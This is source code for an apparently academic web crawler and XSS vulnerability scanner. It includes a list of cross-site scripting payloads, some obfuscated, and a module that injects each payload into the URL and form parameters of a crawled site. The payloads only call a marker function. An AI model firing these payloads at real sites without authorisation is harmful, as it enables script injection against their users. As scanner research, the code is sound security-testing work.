97 |
98 |
99 |
100 |
101 |
102 | a=\"get\";\nb=\"URL(\\\"\";\nc=\"javascript:\";\nd=\"jsb.attack(XSS);\\\")\";\neval(a+b+c+d);
103 | cript:jsb.attack(XSS)\">\n
104 | \n
105 | \n\n\n jsb.attack(\"XSS\")\">\n
106 |
107 |
108 | echo('jsb.attack(\"XSS\")'); ?>
109 | jsb.attack(XSS)\">
110 | +ADw-SCRIPT+AD4-jsb.attack(XSS);+ADw-/SCRIPT+AD4-
111 | ;!--\'=&{()}\\xss
112 | ">
113 | <
114 | """"
115 | \\";jsb.attack(\'XSS\');//
116 |
--------------------------------------------------------------------------------
/crawler/attack/xxxattacks.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 |
18 | import logging
19 | import os
20 | import random
21 | import string
22 |
23 |
24 | __author__ = 'constantin'
25 |
26 |
FILENAME = "/xssvectors.txt"


class XSSVectors():
    """Loads the XSS attack vectors shipped next to this module and provides
    helpers for generating the random marker strings/numbers substituted into
    the payloads (the "XSS" placeholder)."""

    def __init__(self):
        # One attack vector per line; strip the trailing newline character.
        # Bug fix: the file handle was previously never closed.
        self.attack_vectors = []
        vector_path = os.path.dirname(os.path.realpath(__file__)) + FILENAME
        with open(vector_path, "r") as vector_file:
            for line in vector_file:
                self.attack_vectors.append(line[:-1])

    def random_string_generator(self, size=6, chars=string.ascii_uppercase + string.digits + string.ascii_lowercase):
        """Return a random string of exactly `size` characters drawn from `chars`."""
        return "".join(random.choice(chars) for _ in range(size))

    def random_number_generator(self, size=6):
        """Return a random number with exactly `size` digits, as a string.

        Bug fix: the previous implementation built the bounds digit-by-digit
        with a `range(size + 1)` loop and therefore returned `size + 1`
        digits; this version returns exactly `size` digits as the name and
        parameter imply.

        :raises ValueError: if `size` is smaller than 1.
        """
        if size < 1:
            raise ValueError("size must be >= 1")
        return str(random.randint(10 ** (size - 1), 10 ** size - 1))
52 |
--------------------------------------------------------------------------------
/crawler/attacker.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 |
from asyncio.tasks import sleep
import logging
import sys
import time
from urllib.parse import urlparse

from attack.xss import XSSAttacker, AttackResult
from attack.xxxattacks import XSSVectors
from core.jaekcore import JaekCore
from models.url import Url
from models.utils import CrawlSpeed
from utils.domainhandler import DomainHandler
from utils.execptions import LoginFailed
31 |
32 |
33 |
34 | __author__ = 'constantin'
35 |
EMPTY_LIMIT = 5  # consecutive "uninteresting" vectors per parameter before giving up


class Attacker(JaekCore):
    """Replays the XSS vector list against every stored URL (both by replacing
    parameter values and by appending to them) and against every GET form,
    recording successful/failed attacks in the database and re-logging-in
    whenever the session is lost."""

    def __init__(self, config, proxy="", port=0, database_manager=None):
        # Bug fix: proxy and port were previously hard-coded to ""/0 in the
        # super() call, silently discarding the caller's arguments.
        super(Attacker, self).__init__(config, proxy=proxy, port=port,
                                       database_manager=database_manager)

        self._xss = XSSAttacker(self, proxy, port, crawl_speed=CrawlSpeed.Medium,
                                network_access_manager=self._network_access_manager)
        self._xss_vector = XSSVectors()

    def attack(self, user):
        """Entry point: optionally log in as `user`, then run all three attack passes.

        :raises LoginFailed: if credentials are given but the initial login fails.
        """
        self.domain_handler = DomainHandler(self.config.start_page_url, self.database_manager, cluster_manager=None)
        self.user = user
        if user.login_data is not None:
            self.process_with_login = True
            if not self._initial_login():
                raise LoginFailed("Initial login failed...")
        self.attack_all_urls_with_replacing()
        self.attack_all_urls_with_additions()
        self.attack_all_get_forms()

    def _fire_vector(self, attack_url, random_val, empty_counter):
        """Send one attack URL, re-login once if the session was lost, log and
        persist the outcome.  Returns the updated empty-vector counter that the
        per-parameter loops use to abort parameters that never reflect anything.

        This helper factors out logic that was previously triplicated across
        the three attack passes.
        """
        logging.debug("Attack with: {}".format(attack_url))
        result, response_code = self._xss.attack(attack_url, random_val)
        if not self._check_login_status_with_cookies():
            # Bug fix: the original called asyncio's sleep(2000) without
            # awaiting it, which is a no-op; pause for real before re-login.
            time.sleep(2)
            self._initial_login()
            result, response_code = self._xss.attack(attack_url, random_val)
        if response_code is None:
            return empty_counter
        if response_code >= 400 or result == AttackResult.JSON:
            empty_counter = 42  # force the surrounding loop past EMPTY_LIMIT
        logging.debug("Result: {} - Response Code: {}".format(result, response_code))
        if result in (AttackResult.AttackSuccessfull, AttackResult.AttackFailed):
            self.database_manager.insert_attack_result(result, attack_url)
            empty_counter = 0
        else:
            empty_counter += 1
        return empty_counter

    def attack_single_url(self, url, replacement=False):
        """Debug helper: attack one URL either as-is, or with each parameter
        replaced by every vector in turn."""
        if not replacement:
            result, response_code = self._xss.attack(url, "123")
            logging.debug("Result: {}".format(result))
            return
        url = Url(url)
        for parameter_to_attack in url.parameters:
            for vector in self._xss_vector.attack_vectors:
                attack_url = url.scheme + "://" + url.domain + url.path + "?"
                random_val = self._xss_vector.random_number_generator(12)
                for other_parameter in url.parameters:
                    if parameter_to_attack == other_parameter:
                        attack_url += other_parameter + "=" + vector.replace("XSS", random_val) + "&"
                    else:
                        attack_url += other_parameter + "=" + url.parameters[other_parameter][0] + "&"
                attack_url = attack_url[:-1]  # strip the trailing "&"
                logging.debug("Attack with: {}".format(attack_url))
                result, response_code = self._xss.attack(attack_url, random_val)
                logging.debug("Result: {}".format(result))

    def attack_all_urls_with_additions(self):
        """Attack every stored URL of the start domain by appending each vector
        to the existing value of one parameter at a time."""
        domain = urlparse(self.config.start_page_url).netloc
        all_urls = self.database_manager.get_all_urls_to_domain(domain)
        for url in all_urls:
            if len(url.parameters) == 0:
                continue
            logging.debug("Now testing with url: {}".format(url.toString()))
            if self.process_with_login:
                self._handle_possible_logout()
            for parameter_to_attack in url.parameters:
                empty_counter = 0
                for vector in self._xss_vector.attack_vectors:
                    attack_url = url.scheme + "://" + url.domain + url.path + "?"
                    random_val = self._xss_vector.random_number_generator(12)
                    for other_parameter in url.parameters:
                        current_value = url.parameters[other_parameter][0]
                        attack_url += other_parameter + "="
                        if parameter_to_attack == other_parameter:
                            # Bug fix: the original conditional expression bound
                            # over the whole concatenation, so the "name=" prefix
                            # was dropped whenever the stored value was None.
                            if current_value is not None:
                                attack_url += str(current_value)
                            attack_url += vector.replace("XSS", str(random_val))
                        elif current_value is not None:
                            attack_url += current_value
                        attack_url += "&"
                    attack_url = attack_url[:-1]  # strip the trailing "&"
                    empty_counter = self._fire_vector(attack_url, random_val, empty_counter)
                    if empty_counter > EMPTY_LIMIT:
                        break

    def attack_all_urls_with_replacing(self):
        """Attack one representative URL per URL structure by replacing one
        parameter value at a time with each vector."""
        all_urls = self.database_manager.get_one_visited_url_per_structure()
        for url in all_urls:
            if len(url.parameters) == 0:
                continue
            logging.debug("Now testing with url: {}".format(url.toString()))
            if self.process_with_login:
                self._handle_possible_logout()
            for parameter_to_attack in url.parameters:
                empty_counter = 0
                for vector in self._xss_vector.attack_vectors:
                    attack_url = url.scheme + "://" + url.domain + url.path + "?"
                    random_val = self._xss_vector.random_number_generator(12)
                    for other_parameter in url.parameters:
                        if parameter_to_attack == other_parameter:
                            attack_url += other_parameter + "=" + vector.replace("XSS", random_val) + "&"
                        else:
                            current_value = url.parameters[other_parameter][0]
                            attack_url += other_parameter + "="
                            attack_url += current_value if current_value is not None else ""
                            attack_url += "&"
                    attack_url = attack_url[:-1]  # strip the trailing "&"
                    empty_counter = self._fire_vector(attack_url, random_val, empty_counter)
                    if empty_counter > EMPTY_LIMIT:
                        break

    def attack_all_get_forms(self):
        """Attack every stored GET form destination, injecting each vector into
        one form parameter at a time; other parameters keep their recorded
        values (or get a random filler when no value is known)."""
        if self.process_with_login:
            self._handle_possible_logout()
        logging.debug("Attacking with get forms")
        all_forms = self.database_manager.get_one_form_per_destination()
        for form in all_forms:
            logging.debug(form.toString())
            if "javascript" in form.action.complete_url:
                continue
            for param_to_attack in form.parameter:
                if param_to_attack.input_type == "submit" or param_to_attack.name is None:
                    continue
                logging.debug("Now at parameter {}".format(param_to_attack.toString()))
                empty_counter = 0
                for vector in self._xss_vector.attack_vectors:
                    attack_url = form.action.complete_url + "?"
                    random_val = self._xss_vector.random_number_generator(12)
                    for other_parameter in form.parameter:
                        if param_to_attack == other_parameter:
                            if other_parameter is None or other_parameter.name is None:
                                continue
                            attack_url += other_parameter.name + "=" + vector.replace("XSS", random_val) + "&"
                        else:
                            if other_parameter.input_type == "submit" or other_parameter.name is None:
                                continue
                            elif other_parameter.values is None:
                                attack_url += other_parameter.name + "=&"
                            elif other_parameter.values[0] is not None:
                                attack_url += other_parameter.name + "=" + other_parameter.values[0] + "&"
                            else:
                                attack_url += other_parameter.name + "=" + self._xss_vector.random_string_generator(6) + "&"
                    attack_url = attack_url[:-1]  # strip the trailing "&"
                    empty_counter = self._fire_vector(attack_url, random_val, empty_counter)
                    if empty_counter > EMPTY_LIMIT:
                        break
220 |
221 |
222 |
223 |
224 |
225 |
--------------------------------------------------------------------------------
/crawler/core/__init__.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
16 | '''
--------------------------------------------------------------------------------
/crawler/core/clustermanager.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 |
18 | import itertools
19 | import logging
20 | from copy import deepcopy
21 | from models.url import Url
22 | from utils.utils import calculate_similarity_between_pages
23 |
24 |
25 | __author__ = 'constantin'
26 |
CLUSTER_THRESHOLD = .2  # merge clusters while minimum pairwise distance <= this


class ClusterManager():
    """
    A cluster is a collection of similar pages, defined through a cluster function.
    """

    def __init__(self, persistence_manager):
        self._persistence_manager = persistence_manager
        self._similarity_cache = {}  # maps "idA$idB" -> cached similarity result

    @property
    def get_clusters(self):
        # NOTE(review): self._clusters is never assigned in __init__; accessing
        # this property raises AttributeError — confirm whether it is dead code.
        return self._clusters

    def get_cluster(self, url_description):
        try:
            return self._clusters[url_description].values()
        except Exception as err:
            # Preserve the original behaviour (any failure -> KeyError) while
            # avoiding a bare except and keeping the original cause chained.
            raise KeyError("No cluster with that id found") from err

    def add_webpage_to_cluster(self, webpage):
        """Insert a freshly crawled page into the persisted clusters of its
        URL structure and re-cluster."""
        url = Url(webpage.url)
        clusters = self._persistence_manager.get_clusters(url.url_hash)
        if clusters is None:
            self._persistence_manager.write_clusters(url.url_hash, [webpage.id])
            return
        # Flatten the stored clusters into a plain list of page ids.
        page_ids = []
        for c in clusters:
            if isinstance(c, list):
                page_ids.extend(c)
            else:
                page_ids.append(c)
        page_ids.append(webpage.id)
        new_clusters = self.hierarchical_clustering(page_ids, CLUSTER_THRESHOLD)
        # Convert bare integers to single-element lists so Mongo stores every
        # singleton cluster as its own list. Bug fix: the original removed and
        # re-inserted elements while iterating the same list, which can skip
        # elements.
        new_clusters = [[c] if isinstance(c, int) else c for c in new_clusters]
        self._persistence_manager.write_clusters(url.url_hash, new_clusters)

    def hierarchical_clustering(self, clusters, threshold):
        """Agglomeratively merge the two closest clusters until the minimum
        pairwise distance exceeds `threshold`.

        :param clusters: mix of ints (singletons) and tuples (merged clusters)
        :return: remaining clusters; merged clusters are tuples of page ids
        """
        rest_clusters = list(clusters)  # bug fix: don't mutate the caller's list
        while len(rest_clusters) > 1:
            distances = []
            for c1, c2 in itertools.combinations(rest_clusters, 2):
                distances.append((self.calculate_minimum_distance(c1, c2), c1, c2))
            min_distance = min(distances, key=lambda x: x[0])
            if min_distance[0] > threshold:
                break
            rest_clusters.remove(min_distance[1])
            rest_clusters.remove(min_distance[2])
            # Normalise both operands to tuples before concatenating.
            a = (min_distance[1],) if isinstance(min_distance[1], int) else min_distance[1]
            b = (min_distance[2],) if isinstance(min_distance[2], int) else min_distance[2]
            rest_clusters.append(a + b)
        return rest_clusters

    def calculate_minimum_distance(self, cluster1, cluster2):
        """Single-linkage distance: the smallest pairwise distance between a
        page in `cluster1` and a page in `cluster2`."""
        cluster1 = [cluster1] if isinstance(cluster1, int) else list(cluster1)
        cluster2 = [cluster2] if isinstance(cluster2, int) else list(cluster2)
        distances = []
        for x, y in itertools.combinations(cluster1 + cluster2, 2):
            # Skip pairs that live in the same cluster.
            if (x in cluster1 and y in cluster1) or (x in cluster2 and y in cluster2):
                continue
            distances.append((x, y, self.calculate_distance(x, y)))
        min_distance = min(distances, key=lambda x: x[2])
        return min_distance[2]

    def calculate_distance(self, x, y):
        """Distance between two pages = 1 - similarity; similarity results are
        memoized in self._similarity_cache keyed by get_similarity_identifier."""
        name = self.get_similarity_identifier(x, y)
        if name in self._similarity_cache:
            result = self._similarity_cache[name]
        else:
            page_x = self._persistence_manager.get_web_page_to_id(x)
            page_y = self._persistence_manager.get_web_page_to_id(y)
            result = calculate_similarity_between_pages(page_x, page_y, verbose=True)
            self._similarity_cache[name] = result
        return 1 - result

    def get_similarity_identifier(self, x, y):
        """Order-independent cache key for the page pair (x, y)."""
        name = sorted((x, y))
        return str(name[0]) + "$" + str(name[1])

    def calculate_cluster_per_visited_urls(self, url_hash):
        """Ratio of clusters to visited URLs for one URL structure (1.0 when
        nothing has been visited yet)."""
        try:
            return self.num_of_clusters(url_hash) / self.num_of_visited_urls(url_hash)
        except ZeroDivisionError:
            return 1.0

    def num_of_clusters(self, url_hash):
        clusters = self._persistence_manager.get_clusters(url_hash)
        if clusters is not None:
            return len(clusters)
        return 1.0

    def num_of_visited_urls(self, url_hash):
        return self._persistence_manager.count_visited_url_per_hash(url_hash)

    def need_more_urls_of_this_type(self, url_hash):
        """
        :param url_hash:
        :return: if we have seen enough of an url or not
        """
        return self.calculate_cluster_per_visited_urls(url_hash) > CLUSTER_THRESHOLD
155 |
156 |
157 |
158 |
159 |
160 |
161 |
--------------------------------------------------------------------------------
/crawler/core/eventexecutor.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 |
18 | import logging
19 | import random
20 | import string
21 | from enum import Enum
22 |
23 | from PyQt5.Qt import QUrl
24 | from PyQt5.QtWebKitWidgets import QWebPage
25 | from analyzer.helper.formhelper import extract_forms
26 | from analyzer.helper.linkhelper import extract_links
27 |
28 | from analyzer.helper.propertyhelper import property_helper
29 | from models.ajaxrequest import AjaxRequest
30 | from models.deltapage import DeltaPage
31 | from models.enumerations import XHRBehavior
32 | from models.keyclickable import KeyClickable
33 | from core.interactioncore import InteractionCore
34 | from models.utils import CrawlSpeed, purge_dublicates
35 |
36 |
class EventExecutor(InteractionCore):
    """Fires a single DOM event on a clickable element inside the hosted
    QWebPage and extracts the resulting "delta page" (new clickables, links,
    forms and ajax requests), or reports a URL change / popup instead."""

    def __init__(self, parent, proxy="", port=0, crawl_speed=CrawlSpeed.Medium, network_access_manager=None):
        super(EventExecutor, self).__init__(parent, proxy, port, crawl_speed, network_access_manager)
        self._url_changed = False  # Indicates if an event changes a location => treat it as link!
        self._new_url = None
        self.timeming_events = None  # (time, event_type, function_id) of the slowest captured timer
        self.none_key_events = ['click', 'focus', 'blur', 'dblclick', 'input', 'change',
                                'mousedown', 'mousemove', 'mouseout', 'mouseover', 'mouseup',
                                'resize', 'scroll', 'select', 'submit', 'load', 'unload', 'mouseleave']
        self.key_events = ['keyup', 'keydown', 'keypress']
        self.supported_events = self.none_key_events + self.key_events

        self.seen_timeouts = {}
        self.popup = None  # reference if a popup occurs...
        self.mainFrame().urlChanged.connect(self._url_changes)

    def execute(self, webpage, timeout=5, element_to_click=None, xhr_options=XHRBehavior.ObserveXHR, pre_clicks=None):
        """Load `webpage`, replay `pre_clicks`, fire the event of
        `element_to_click` and return a tuple (EventResult, DeltaPage or None).

        Bug fix: `pre_clicks` previously used a mutable default argument ([]).
        NOTE(review): `element_to_click` defaults to None but is dereferenced
        immediately — callers must always pass it; confirm before tightening.
        """
        if pre_clicks is None:
            pre_clicks = []
        logging.debug(
            "EventExecutor test started on {}...".format(webpage.url) + " with " + element_to_click.toString())
        self._analyzing_finished = False
        self._loading_complete = False
        self.xhr_options = xhr_options
        self.element_to_click = None
        self.ajax_requests = []
        self._new_url = None
        self.timeming_events = None
        self._capturing_ajax = False
        self._new_clickables = []
        self.element_to_click = element_to_click
        self.popup = None
        self.mainFrame().setHtml(webpage.html, QUrl(webpage.url))
        target_tag = element_to_click.dom_address.split("/")
        target_tag = target_tag[-1]
        if target_tag in ['video']:
            return EventResult.UnsupportedTag, None

        t = 0.0
        while not self._loading_complete and t < timeout:  # Waiting for finish processing
            self._wait(0.1)
            t += 0.1
        if not self._loading_complete:
            logging.debug("Timeout occurs while initial page loading...")
            return EventResult.ErrorWhileInitialLoading, None

        # Prepare Page for clicking...
        self._wait(0.1)
        for click in pre_clicks:
            pre_click_elem = None
            logging.debug("Click on: " + click.toString())
            # Locate the element to pre-click: by id, then class, then DOM path.
            if click.id is not None and click.id != "":
                pre_click_elem = self.search_element_with_id(click.id)
            if click.html_class is not None and pre_click_elem is None:
                pre_click_elem = self.search_element_with_class(click.html_class, click.dom_address)
            if pre_click_elem is None:
                pre_click_elem = self.search_element_without_id_and_class(click.dom_address)

            if pre_click_elem is None:
                logging.debug("Preclicking element not found")
                return EventResult.PreviousClickNotFound, None

            if "javascript:" not in click.event:
                js_code = click.event
                if js_code[0:2] == "on":
                    js_code = js_code[2:]  # if event begins with "on", strip it
                js_code = "Simulate." + js_code + "(this);"
                pre_click_elem.evaluateJavaScript(js_code)  # Waiting for finish processing
            else:
                pre_click_elem.evaluateJavaScript(click.event[len("javascript:"):])
            self._wait(self.wait_for_event)

        is_key_event = False
        # Now execute the target event
        if "javascript:" not in element_to_click.event:
            self._url_changed = False
            js_code = element_to_click.event
            if js_code[0:2] == "on":
                js_code = js_code[2:]  # if event begins with "on", strip it

            if js_code in self.key_events:
                is_key_event = True
                random_char = random.choice(string.ascii_letters)
                js_code = "Simulate." + js_code + "(this, '" + random_char + "');"
            else:
                js_code = "Simulate." + js_code + "(this);"
        else:
            js_code = element_to_click.event[len("javascript:"):]

        self.mainFrame().evaluateJavaScript(
            self._addEventListener)  # This time it is here, because I dont want to have the initial addings

        # Locate the target clickable the same way as the pre-click elements.
        real_clickable = None
        if element_to_click.id is not None and element_to_click.id != "":
            real_clickable = self.search_element_with_id(element_to_click.id)
        if element_to_click.html_class is not None and real_clickable is None:
            real_clickable = self.search_element_with_class(element_to_click.html_class, element_to_click.dom_address)
        if real_clickable is None:
            real_clickable = self.search_element_without_id_and_class(element_to_click.dom_address)

        if real_clickable is None:
            logging.debug("Target Clickable not found")
            return EventResult.TargetElementNotFound, None

        # Capture only ajax requests triggered by this event.
        self._capturing_ajax = True
        real_clickable.evaluateJavaScript(js_code)
        self._wait(0.5)
        self._capturing_ajax = False
        links, clickables = extract_links(self.mainFrame(), webpage.url)

        forms = extract_forms(self.mainFrame())
        elements_with_event_properties = property_helper(self.mainFrame())
        self.mainFrame().evaluateJavaScript(self._property_obs_js)
        self._wait(0.1)

        html = self.mainFrame().toHtml()
        url = self.mainFrame().url().toString()

        if is_key_event:
            generator = KeyClickable(element_to_click, random_char)
        else:
            generator = element_to_click
        if self._url_changed and self._new_url.toString() != webpage.url:
            # The event navigated away: report the new URL, no delta HTML.
            delta_page = DeltaPage(-1, self._new_url.toString(), html=None, generator=generator, parent_id=webpage.id,
                                   cookiesjar=webpage.cookiejar)
            self._analyzing_finished = True
            self.mainFrame().setHtml(None)
            return EventResult.URLChanged, delta_page
        elif self.popup is not None:
            logging.debug("Event creates Popup with Url: {}".format(self.popup.mainFrame().url().toString()))
            popup_url = self.popup.mainFrame().url().toString()
            delta_page = DeltaPage(-1, popup_url, html=None, generator=generator, parent_id=webpage.id)
            self.popup = None
            self._analyzing_finished = True
            self.mainFrame().setHtml(None)
            return EventResult.CreatesPopup, delta_page
        else:
            delta_page = DeltaPage(-1, webpage.url, html, generator=generator, parent_id=webpage.id,
                                   cookiesjar=webpage.cookiejar)
            delta_page.clickables = self._new_clickables  # Set by add eventlistener code
            delta_page.clickables.extend(clickables)
            delta_page.clickables.extend(elements_with_event_properties)
            delta_page.clickables = purge_dublicates(delta_page.clickables)
            try:
                delta_page.clickables.remove(self.element_to_click)  # remove the clickable self...
            except ValueError:
                pass
            delta_page.links = links
            delta_page.forms = forms
            delta_page.ajax_requests = self.ajax_requests
            self._analyzing_finished = True
            self.mainFrame().setHtml(None)
            return EventResult.Ok, delta_page

    def javaScriptAlert(self, frame, msg):
        logging.debug("Alert occurs in frame: {} with message: {}".format(frame.baseUrl().toString(), msg))

    def javaScriptConfirm(self, frame, msg):
        logging.debug("Confirm occurs in frame: {} with message: {}".format(frame.baseUrl().toString(), msg))
        return True

    def loadFinishedHandler(self, result):
        if not self._analyzing_finished:  # Just to ignoring setting of non page....
            self._loading_complete = True

    def jsWinObjClearedHandler(self):  # Adding here the js-scripts corresponding to the phases
        if not self._analyzing_finished:
            self.mainFrame().evaluateJavaScript(self._lib_js)
            self.mainFrame().evaluateJavaScript(self._md5)
            self.mainFrame().addToJavaScriptWindowObject("jswrapper", self._js_bridge)
            if self.xhr_options == XHRBehavior.ObserveXHR:
                self.mainFrame().evaluateJavaScript(self._xhr_observe_js)
            if self.xhr_options == XHRBehavior.InterceptXHR:
                self.mainFrame().evaluateJavaScript(self._xhr_interception_js)

    def capturing_requests(self, request):
        if self._capturing_ajax:
            logging.debug("Ajax to: {} captured...".format(request['url']))
            ajax_request = AjaxRequest(request['method'], request['url'], self.element_to_click, request['parameters'])
            if ajax_request not in self.ajax_requests:
                self.ajax_requests.append(ajax_request)

    def javaScriptConsoleMessage(self, message, lineNumber, sourceID):
        logging.debug("Console(EventExecutor): " + message + " at: " + str(lineNumber))

    def capture_timeout_call(self, timingevent):
        """Remember the slowest timer (setTimeout/setInterval) the page registers."""
        try:
            if timingevent['time'] != "undefined":
                time = timingevent['time']  # millisecond
                event_type = timingevent['type']
                event_id = timingevent['function_id']
                if self.timeming_events is not None:
                    if time > self.timeming_events[0]:
                        self.timeming_events = (time, event_type, event_id)
                else:
                    self.timeming_events = (time, event_type, event_id)
        except KeyError as err:
            logging.debug("Key error occurred in Events " + str(err))

    def _url_changes(self, url):
        self._url_changed = True
        self._new_url = url

    def createWindow(self, webWindowType):
        # Bug fix: this method was defined twice; the first (logging-only)
        # definition was dead code silently overridden by the second. The
        # merged version both logs and keeps the popup page for execute().
        logging.debug("Creating new window...{}".format(webWindowType))
        self.popup = QWebPage()
        return self.popup
247 |
248 |
class EventResult(Enum):
    """Outcome of EventExecutor.execute() for a single clickable element."""
    Ok = 0                          # event fired; delta page extracted
    PreviousClickNotFound = 1       # a required pre-click element was missing
    TargetElementNotFound = 2       # the target clickable could not be located
    ErrorWhileInitialLoading = 3    # page never finished loading before timeout
    URLChanged = 4                  # the event navigated away; treat it as a link
    UnsupportedTag = 5              # target tag (e.g. video) is not handled
    CreatesPopup = 6                # the event opened a popup window
257 |
--------------------------------------------------------------------------------
/crawler/core/formhandler.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 |
18 | import logging
19 |
20 | from PyQt5.Qt import QUrl
21 |
22 | from core.interactioncore import InteractionCore
23 | from core.eventexecutor import EventResult
24 | from analyzer.helper.formhelper import extract_forms
25 | from analyzer.helper.linkhelper import extract_links
26 | from models.clickable import Clickable
27 | from models.utils import CrawlSpeed, purge_dublicates
28 |
29 | __author__ = 'constantin'
30 |
31 |
class FormHandler(InteractionCore):
    """Loads a page into the embedded QWebPage, fills a given form with the
    supplied data, submits it, and harvests the resulting page state
    (HTML, clickables, forms, links).

    NOTE(review): error paths of submit_form() return a 2-tuple while the
    success path returns a 6-tuple; the caller in jaekcore wraps the call in
    ``try/except ValueError`` and relies on the unpacking error, so the
    inconsistent shapes are intentional-by-use and left unchanged.
    """


    def __init__(self, parent, proxy = "", port = 0, crawl_speed = CrawlSpeed.Medium, network_access_manager = None):
        # All wiring (signals, JS payloads, proxy) happens in InteractionCore.
        super(FormHandler, self).__init__(parent, proxy, port, crawl_speed, network_access_manager)
        #self.mainFrame().urlChanged.connect(self._url_changes)

    def submit_form(self, form, webpage, data=dict(), timeout=5):
        """Fill *form* on *webpage* with *data* and submit it.

        :param form: abstract form model; matched against the live DOM via
                     its ``dom_address`` XPath.
        :param webpage: page object providing ``url`` and ``html``.
        :param data: dict mapping form-field names to the values to set.
        :param timeout: seconds to wait for the initial page load.
        :return: on success ``(EventResult.Ok, html, clickables, forms,
                 links, [])``; on failure ``(EventResult.<error>, None)``
                 (see class NOTE about the differing tuple shapes).
        """
        logging.debug("FormHandler on Page: {} started...".format(webpage.url))
        self._loading_complete = False
        self._analyzing_finished = False
        # webpage.url may be a QUrl or a plain string.
        try:
            url = webpage.url.toString()
        except AttributeError:
            url = webpage.url
        self.mainFrame().setHtml(webpage.html, QUrl(url))
        self._new_clickables = []

        t = 0.0
        while not self._loading_complete and t < timeout: # Waiting for finish processing
            self._wait(0.1)
            t += 0.1
        if not self._loading_complete:
            logging.debug("Timeout occurs while initial page loading...")
            return EventResult.ErrorWhileInitialLoading, None

        # Locate the live DOM form whose XPath matches the abstract model.
        target_form = None
        p_forms = self.mainFrame().findAllElements("form")
        for tmp_form in p_forms:
            path = tmp_form.evaluateJavaScript("getXPath(this)")
            if path == form.dom_address:
                target_form = tmp_form
                break
        if target_form is None:
            return EventResult.TargetElementNotFound, None

        for elem in form.parameter: #Iterate through abstract form representation
            if elem.name in data: #Check if we have the data we must set
                elem_found = False # Indicates if we found the element in the html
                value_to_set = data[elem.name]
                for tmp in target_form.findAll(elem.tag): #Locking in the target form, if we found the element we have to set
                    if tmp.attribute("name") == elem.name: # Has the current element in the html the same name as our data
                        # NOTE(review): value_to_set is spliced into JS
                        # unescaped — a value containing a single quote breaks
                        # (or injects into) the snippet. Confirm inputs are
                        # trusted before relying on this.
                        tmp.evaluateJavaScript("this.value = '" + value_to_set + "';")
                        elem_found = True
                        break
                if not elem_found:
                    return EventResult.TargetElementNotFound, None
        # Now we should have set all known parameters, next click the submit button
        q_submit_button = None
        if "submit" in form.toString():
            inputs = target_form.findAll("input") + target_form.findAll("button")
            for el in inputs:
                if el.attribute("type") == "submit":
                    q_submit_button = el
                    break
            #q_submit_button.evaluateJavaScript("this.id='oxyfrymbel'")
        else:
            logging.debug(form.toString())

        # Fallback: no explicit submit input — accept a single <button>.
        if q_submit_button is None:
            inputs = target_form.findAll("button")
            q_submit_button = None
            if len(inputs) > 1:
                logging.debug("Cannot locate login button...")
                return EventResult.TargetElementNotFound, None
            elif len(inputs) == 1:
                q_submit_button = inputs[0]

        # Prefer the form's onsubmit handler; evaluate its statements one by
        # one, skipping 'return ...' snippets that only make sense in-form.
        method = target_form.attribute("onsubmit")
        if method is not None and method != "":
            js_code_snippets = method.split(";")
            for snippet in js_code_snippets:
                if "return" in snippet or snippet == "":
                    logging.debug("Ignoring snippet: {}".format(snippet))
                    continue
